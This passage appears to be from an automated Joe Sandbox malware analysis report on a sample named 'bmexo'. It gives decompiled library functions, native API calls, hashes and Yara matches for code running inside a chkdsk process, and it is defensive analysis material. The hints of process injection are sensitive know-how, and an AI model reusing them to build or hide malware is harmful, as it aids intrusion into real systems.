                                          • Opcode ID: b4443fc9f31c86e9626f505bb256d3715e66e7e01f1617729c9f78fbb140f8ae
                                          • Instruction ID: b85017fdeed459ce3e2837d68eeccf53ea42e267804486f930ddcc8d970817ca
                                          • Opcode Fuzzy Hash: b4443fc9f31c86e9626f505bb256d3715e66e7e01f1617729c9f78fbb140f8ae
                                          • Instruction Fuzzy Hash: D70147729003587BE7206771AC4BFDF3B9CEB61764F100461FA0197182E5B89802A27C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 45%
                                          			E009C53A5(signed int _a4, char _a8) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t32;
                                          				signed int _t37;
                                          				signed int _t40;
                                          				signed int _t42;
                                          				void* _t45;
                                          				intOrPtr _t46;
                                          				void* _t48;
                                          				signed int _t49;
                                          				void* _t51;
                                          				signed int _t57;
                                          				signed int _t64;
                                          				signed int _t71;
                                          				void* _t74;
                                          				intOrPtr _t78;
                                          				signed int* _t79;
                                          				void* _t85;
                                          				signed int _t86;
                                          				signed int _t92;
                                          				void* _t104;
                                          				void* _t105;
                                          
                                          				_t64 = _a4;
                                          				_t32 =  *(_t64 + 0x28);
                                          				_t71 = _t64 + 0x28;
                                          				_push(_t92);
                                          				if(_t32 < 0) {
                                          					_t78 =  *[fs:0x18];
                                          					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                          					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                          						goto L3;
                                          					} else {
                                          						__eflags = _t32 | 0xffffffff;
                                          						asm("lock xadd [ecx], eax");
                                          						return 1;
                                          					}
                                          				} else {
                                          					L3:
                                          					_push(_t86);
                                          					while(1) {
                                          						L4:
                                          						__eflags = _t32;
                                          						if(_t32 == 0) {
                                          							break;
                                          						}
                                          						__eflags = _a8;
                                          						if(_a8 == 0) {
                                          							__eflags = 0;
                                          							return 0;
                                          						} else {
                                          							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                          							_t79 = _t64 + 0x24;
                                          							_t71 = 1;
                                          							asm("lock xadd [eax], ecx");
                                          							_t32 =  *(_t64 + 0x28);
                                          							_a4 = _t32;
                                          							__eflags = _t32;
                                          							if(_t32 != 0) {
                                          								L19:
                                          								_t86 = 0;
                                          								__eflags = 0;
                                          								while(1) {
                                          									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                          									asm("sbb esi, esi");
                                          									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00a801c0;
                                          									_push(_t92);
                                          									_push(0);
                                          									_t37 = E0099F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                          									__eflags = _t37 - 0x102;
                                          									if(_t37 != 0x102) {
                                          										break;
                                          									}
                                          									_t71 =  *(_t92 + 4);
                                          									_t85 =  *_t92;
                                          									_t51 = L009E4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                          									_push(_t85);
                                          									_push(_t51);
                                          									L009F3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                          									L009F3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                          									_t86 = _t86 + 1;
                                          									_t105 = _t104 + 0x28;
                                          									__eflags = _t86 - 2;
                                          									if(__eflags > 0) {
                                          										E00A2217A(_t71, __eflags, _t64);
                                          									}
                                          									_push("RTL: Re-Waiting\n");
                                          									_push(0);
                                          									_push(0x65);
                                          									L009F3F92();
                                          									_t104 = _t105 + 0xc;
                                          								}
                                          								__eflags = _t37;
                                          								if(__eflags < 0) {
                                          									_push(_t37);
                                          									E009E3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                          									asm("int3");
                                          									_t40 =  *_t71;
                                          									 *_t71 = 0;
                                          									__eflags = _t40;
                                          									if(_t40 == 0) {
                                          										L1:
                                          										_t42 = E009C5384(_t92 + 0x24);
                                          										if(_t42 != 0) {
                                          											goto L31;
                                          										} else {
                                          											goto L2;
                                          										}
                                          									} else {
                                          										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                          										_push( &_a4);
                                          										_push(_t40);
                                          										_t49 = E0099F970( *((intOrPtr*)(_t92 + 0x18)));
                                          										__eflags = _t49;
                                          										if(__eflags >= 0) {
                                          											goto L1;
                                          										} else {
                                          											_push(_t49);
                                          											E009E3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                          											L31:
                                          											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                          											_push( &_a4);
                                          											_push(1);
                                          											_t42 = E0099F970( *((intOrPtr*)(_t92 + 0x20)));
                                          											__eflags = _t42;
                                          											if(__eflags >= 0) {
                                          												L2:
                                          												return _t42;
                                          											} else {
                                          												_push(_t42);
                                          												E009E3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                          												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                          												_push( &_a4);
                                          												_push(1);
                                          												_t42 = E0099F970( *((intOrPtr*)(_t92 + 0x20)));
                                          												__eflags = _t42;
                                          												if(__eflags >= 0) {
                                          													goto L2;
                                          												} else {
                                          													_push(_t42);
                                          													_t45 = E009E3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                          													asm("int3");
                                          													while(1) {
                                          														_t74 = _t45;
                                          														__eflags = _t45 - 1;
                                          														if(_t45 != 1) {
                                          															break;
                                          														}
                                          														_t86 = _t86 | 0xffffffff;
                                          														_t45 = _t74;
                                          														asm("lock cmpxchg [ebx], edi");
                                          														__eflags = _t45 - _t74;
                                          														if(_t45 != _t74) {
                                          															continue;
                                          														} else {
                                          															_t46 =  *[fs:0x18];
                                          															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                          															return _t46;
                                          														}
                                          														goto L38;
                                          													}
                                          													E009C5329(_t74, _t92);
                                          													_push(1);
                                          													_t48 = E009C53A5(_t92);
                                          													return _t48;
                                          												}
                                          											}
                                          										}
                                          									}
                                          								} else {
                                          									_t32 =  *(_t64 + 0x28);
                                          									continue;
                                          								}
                                          							} else {
                                          								_t71 =  *_t79;
                                          								__eflags = _t71;
                                          								if(__eflags > 0) {
                                          									while(1) {
                                          										_t57 = _t71;
                                          										asm("lock cmpxchg [edi], esi");
                                          										__eflags = _t57 - _t71;
                                          										if(_t57 == _t71) {
                                          											break;
                                          										}
                                          										_t71 = _t57;
                                          										__eflags = _t57;
                                          										if(_t57 > 0) {
                                          											continue;
                                          										}
                                          										break;
                                          									}
                                          									_t32 = _a4;
                                          									__eflags = _t71;
                                          								}
                                          								if(__eflags != 0) {
                                          									continue;
                                          								} else {
                                          									goto L19;
                                          								}
                                          							}
                                          						}
                                          						goto L38;
                                          					}
                                          					_t71 = _t71 | 0xffffffff;
                                          					_t32 = 0;
                                          					asm("lock cmpxchg [edx], ecx");
                                          					__eflags = 0;
                                          					if(0 != 0) {
                                          						goto L4;
                                          					} else {
                                          						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                          						return 1;
                                          					}
                                          				}
                                          				L38:
                                          			}

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00A022F4
                                          Strings
                                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00A022FC
                                          • RTL: Resource at %p, xrefs: 00A0230B
                                          • RTL: Re-Waiting, xrefs: 00A02328
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1050432541.0000000000990000.00000040.00000800.00020000.00000000.sdmp, Offset: 00980000, based on PE: true
                                          • Associated: 00000006.00000002.1050424338.0000000000980000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051422283.0000000000A70000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051432304.0000000000A80000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051440727.0000000000A84000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051450489.0000000000A87000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051476372.0000000000A90000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000006.00000002.1051559684.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_980000_bmexo.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                          • API String ID: 885266447-871070163
                                          • Opcode ID: bbd54237301702c2e372daa391cbd9c7fe640b65595180a6dbe78d931b187ec8
                                          • Instruction ID: 3b28890216afc1eddb79998d31d0e1349ec28625c4a84119a3cd6c98056ddf1d
                                          • Opcode Fuzzy Hash: bbd54237301702c2e372daa391cbd9c7fe640b65595180a6dbe78d931b187ec8
                                          • Instruction Fuzzy Hash: 85514871600745ABEF11DB69DC85FA673ACAFD8360F114229FD08DB2C1EB61ED8187A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F291C6(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				signed int _v20;
                                          				signed int _t35;
                                          				int _t38;
                                          				signed int _t41;
                                          				int _t42;
                                          				intOrPtr* _t44;
                                          				int _t47;
                                          				short* _t49;
                                          				intOrPtr _t50;
                                          				intOrPtr _t54;
                                          				int _t55;
                                          				signed int _t59;
                                          				char* _t62;
                                          
                                          				_t62 = _a8;
                                          				if(_t62 == 0) {
                                          					L5:
                                          					return 0;
                                          				}
                                          				_t50 = _a12;
                                          				if(_t50 == 0) {
                                          					goto L5;
                                          				}
                                          				if( *_t62 != 0) {
                                          					E00F24BFC( &_v20, _a16);
                                          					_t35 = _v20;
                                          					__eflags =  *(_t35 + 0xa8);
                                          					if( *(_t35 + 0xa8) != 0) {
                                          						_t38 = E00F2917B( *_t62 & 0x000000ff,  &_v20);
                                          						__eflags = _t38;
                                          						if(_t38 == 0) {
                                          							__eflags = _a4;
                                          							_t41 = _v20;
                                          							_t59 = 1;
                                          							_t28 = _t41 + 4; // 0x840ffff8
                                          							_t42 = MultiByteToWideChar( *_t28, 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
                                          							__eflags = _t42;
                                          							if(_t42 != 0) {
                                          								L21:
                                          								__eflags = _v8;
                                          								if(_v8 != 0) {
                                          									_t54 = _v12;
                                          									_t31 = _t54 + 0x70;
                                          									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
                                          									__eflags =  *_t31;
                                          								}
                                          								return _t59;
                                          							}
                                          							L20:
                                          							_t44 = E00F21CC3();
                                          							_t59 = _t59 | 0xffffffff;
                                          							__eflags = _t59;
                                          							 *_t44 = 0x2a;
                                          							goto L21;
                                          						}
                                          						_t59 = _v20;
                                          						__eflags =  *(_t59 + 0x74) - 1;
                                          						if( *(_t59 + 0x74) <= 1) {
                                          							L15:
                                          							_t20 = _t59 + 0x74; // 0xe1c11fe1
                                          							__eflags = _t50 -  *_t20;
                                          							L16:
                                          							if(__eflags < 0) {
                                          								goto L20;
                                          							}
                                          							__eflags = _t62[1];
                                          							if(_t62[1] == 0) {
                                          								goto L20;
                                          							}
                                          							L18:
                                          							_t22 = _t59 + 0x74; // 0xe1c11fe1
                                          							_t59 =  *_t22;
                                          							goto L21;
                                          						}
                                          						_t12 = _t59 + 0x74; // 0xe1c11fe1
                                          						__eflags = _t50 -  *_t12;
                                          						if(__eflags < 0) {
                                          							goto L16;
                                          						}
                                          						__eflags = _a4;
                                          						_t17 = _t59 + 0x74; // 0xe1c11fe1
                                          						_t18 = _t59 + 4; // 0x840ffff8
                                          						_t47 = MultiByteToWideChar( *_t18, 9, _t62,  *_t17, _a4, 0 | _a4 != 0x00000000);
                                          						_t59 = _v20;
                                          						__eflags = _t47;
                                          						if(_t47 != 0) {
                                          							goto L18;
                                          						}
                                          						goto L15;
                                          					}
                                          					_t55 = _a4;
                                          					__eflags = _t55;
                                          					if(_t55 != 0) {
                                          						 *_t55 =  *_t62 & 0x000000ff;
                                          					}
                                          					_t59 = 1;
                                          					goto L21;
                                          				}
                                          				_t49 = _a4;
                                          				if(_t49 != 0) {
                                          					 *_t49 = 0;
                                          				}
                                          				goto L5;
			}

                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F291FC
                                          • __isleadbyte_l.LIBCMT ref: 00F2922A
                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,E1C11FE1,00BFBBEF,00000000), ref: 00F29258
                                          • MultiByteToWideChar.KERNEL32(840FFFF8,00000009,?,00000001,00BFBBEF,00000000), ref: 00F2928E
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1052302354.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000006.00000002.1052293820.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1052319704.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1052334096.0000000000F33000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1052343640.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: e3c5ecbfb7f4402f8a5ceff8ac18de2e9668d6af25a222035659cdbc9637dd29
                                          • Instruction ID: 34b7bf88b492c4c59b988d285d04bcdaf9f50fc81949221ba18132c730b57abb
                                          • Opcode Fuzzy Hash: e3c5ecbfb7f4402f8a5ceff8ac18de2e9668d6af25a222035659cdbc9637dd29
                                          • Instruction Fuzzy Hash: C131E431A0826AFFDB218F75EC44BAA7BA5FF41320F154128E8648B1E0D7B1D851EB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F2A94D(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                          				intOrPtr _t25;
                                          				void* _t26;
                                          
                                          				_t25 = _a16;
                                          				if(_t25 == 0x65 || _t25 == 0x45) {
                                          					_t26 = E00F2AE9E(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                          					goto L9;
                                          				} else {
                                          					_t34 = _t25 - 0x66;
                                          					if(_t25 != 0x66) {
                                          						__eflags = _t25 - 0x61;
                                          						if(_t25 == 0x61) {
                                          							L7:
                                          							_t26 = E00F2A9D3(_a4, _a8, _a12, _a20, _a24, _a28);
                                          						} else {
                                          							__eflags = _t25 - 0x41;
                                          							if(__eflags == 0) {
                                          								goto L7;
                                          							} else {
                                          								_t26 = E00F2B119(__esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                          							}
                                          						}
                                          						L9:
                                          						return _t26;
                                          					} else {
                                          						return E00F2B058(__esi, _t34, _a4, _a8, _a12, _a20, _a28);
                                          					}
                                          				}
			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.1052302354.0000000000F21000.00000020.00000001.01000000.00000005.sdmp, Offset: 00F20000, based on PE: true
• Associated: 00000006.00000002.1052293820.0000000000F20000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1052319704.0000000000F2E000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1052334096.0000000000F33000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.1052343640.0000000000F37000.00000002.00000001.01000000.00000005.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_f20000_bmexo.jbxd
                                          Similarity
                                          • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                          • String ID:
                                          • API String ID: 3016257755-0
                                          • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction ID: 0f974109ce9aa9442daa4af383d644670cdb3cd038edc5ee5ffd28896f359a78
                                          • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                          • Instruction Fuzzy Hash: 5F014B7244025EFBCF125E85ED518EE3F27BB18354B5A8515FE2958031D336C9B1BB82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Execution Graph

                                          Execution Coverage:2.3%
                                          Dynamic/Decrypted Code Coverage:1.7%
                                          Signature Coverage:0%
                                          Total number of Nodes:706
                                          Total number of Limit Nodes:92

                                          Control-flow Graph: 578 aa30a-aa361 call aaf60 NtCreateFile
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000005,00000000,000A5807,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,000A5807,00000000,00000005,00000060,00000000,00000000), ref: 000AA35D
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 526d8af1cc16e6cc8e77e747ce593d3ecd62deabcd067f35c37ebd3221ce3384
                                          • Instruction ID: 5b098419a38f314ec1b3447c7b198369272d7c06b0bd10c79b9dedcdc3687fac
                                          • Opcode Fuzzy Hash: 526d8af1cc16e6cc8e77e747ce593d3ecd62deabcd067f35c37ebd3221ce3384
                                          • Instruction Fuzzy Hash: 1F01B2B6201108AFDB48CF89DD84EDB37A9EF8C754F118209BA0D97245C630E851CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph: 584 aa310-aa326 585 aa32c-aa361 NtCreateFile 584->585 586 aa327 call aaf60 584->586 586->585
                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00000005,00000000,000A5807,00000005,FFFFFFFF,?,?,FFFFFFFF,00000005,000A5807,00000000,00000005,00000060,00000000,00000000), ref: 000AA35D
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                          • Instruction ID: 6ddbb91c26d3c13b7dfacc4c5120fd77cd6c108b4e6f7e2558dfd52536995af9
                                          • Opcode Fuzzy Hash: 48d3632995a7b26b824f235392bcc6b0a4ea212460d230c7ade1e6732e9d5a4a
                                          • Instruction Fuzzy Hash: E5F06DB6215208AFCB48DF89DC85EEB77ADAF8C754F118258BA0997241D630F851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph: 587 aa43a-aa43c 588 aa43e-aa469 call aaf60 NtClose 587->588 589 aa40d-aa426 587->589 590 aa42c-aa439 589->590 591 aa427 call aaf60 589->591 591->590
                                          APIs
                                          • NtClose.NTDLL(000A59A0,00000206,?,000A59A0,00000005,FFFFFFFF), ref: 000AA465
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 96a0fe0b6fb14caa950e60e142c5327bed1a3eda9c268077f3c50300f493a8ba
                                          • Instruction ID: e026732d26973c8e848944f83031661203235c941d1e2512f859bb05c18e5fe3
                                          • Opcode Fuzzy Hash: 96a0fe0b6fb14caa950e60e142c5327bed1a3eda9c268077f3c50300f493a8ba
                                          • Instruction Fuzzy Hash: E6F0F0762002046FCB14EBE8DC88DE77B98EF85720F1082A5FA5C5B203C630E604C7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtReadFile.NTDLL(000A59C2,5D9515B3,FFFFFFFF,000A5681,00000206,?,000A59C2,00000206,000A5681,FFFFFFFF,5D9515B3,000A59C2,00000206,00000000), ref: 000AA405
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                          • Instruction ID: 2e7aa00841df56ee78ae12b2aa4615553d3f73f594cdfbd13956bb1f83754da3
                                          • Opcode Fuzzy Hash: a61962a776c40c0761ec9b5d264e231ef2a343af67136adf04206c6c4bc3357e
                                          • Instruction Fuzzy Hash: 00F0B7B2200208AFCB18DF99DC85EEB77ADEF8C754F118258BE0D97241D630E811CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00092D11,00002000,00003000,00000004), ref: 000AA529
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: 8ea367853878e2a12d50fe2c5dd6769ea30187154150b65441a91f214ad7f4df
                                          • Instruction ID: 941b64f263e922f64db3fb1f1a4098279cade5e1e4eac6e0e51a1d006f7bcebb
                                          • Opcode Fuzzy Hash: 8ea367853878e2a12d50fe2c5dd6769ea30187154150b65441a91f214ad7f4df
                                          • Instruction Fuzzy Hash: 37F08CB2610119AFDB14DF98DC81EEB7BA8EF8D344F118118FE0DA7242C630E811CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00092D11,00002000,00003000,00000004), ref: 000AA529
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                          • Instruction ID: ab9f5d10be601f42032e75e32301439c3cc46a9d6e3b764bbff35ce10e7a43dc
                                          • Opcode Fuzzy Hash: 33bb83296b48386454dbb765a9fa584987a824901d4fa82aee9f69387c62dbb1
                                          • Instruction Fuzzy Hash: 43F0F2B2210208ABDB18DF89DC81EAB77ADAF88654F118118BA0897241C630E810CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • NtClose.NTDLL(000A59A0,00000206,?,000A59A0,00000005,FFFFFFFF), ref: 000AA465
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1172863395.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Offset: 00090000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_90000_chkdsk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                          • Instruction ID: 4a555a709dca0368a8842ae22a5ce294f6f757af01c04b687b1686257272d3f3
                                          • Opcode Fuzzy Hash: 881ea047b92b26aa447024a6cbf2ec0bd8a5bbf6b70a504f16765888542bc5d5
                                          • Instruction Fuzzy Hash: D7D01772200218ABD624EBD8DC89ED77BACDF49A60F118065BA485B282C630FA00C6E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
                                          • Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
                                          • Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
                                          • Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
                                          • Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1173489046.0000000002380000.00000040.00000800.00020000.00000000.sdmp, Offset: 02370000, based on PE: true
                                          • Associated: 00000008.00000002.1173478360.0000000002370000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173596901.0000000002460000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173605158.0000000002470000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173612960.0000000002474000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173630096.0000000002477000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173640722.0000000002480000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000008.00000002.1173687030.00000000024E0000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_2370000_chkdsk.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
                                          • Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
                                          • Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
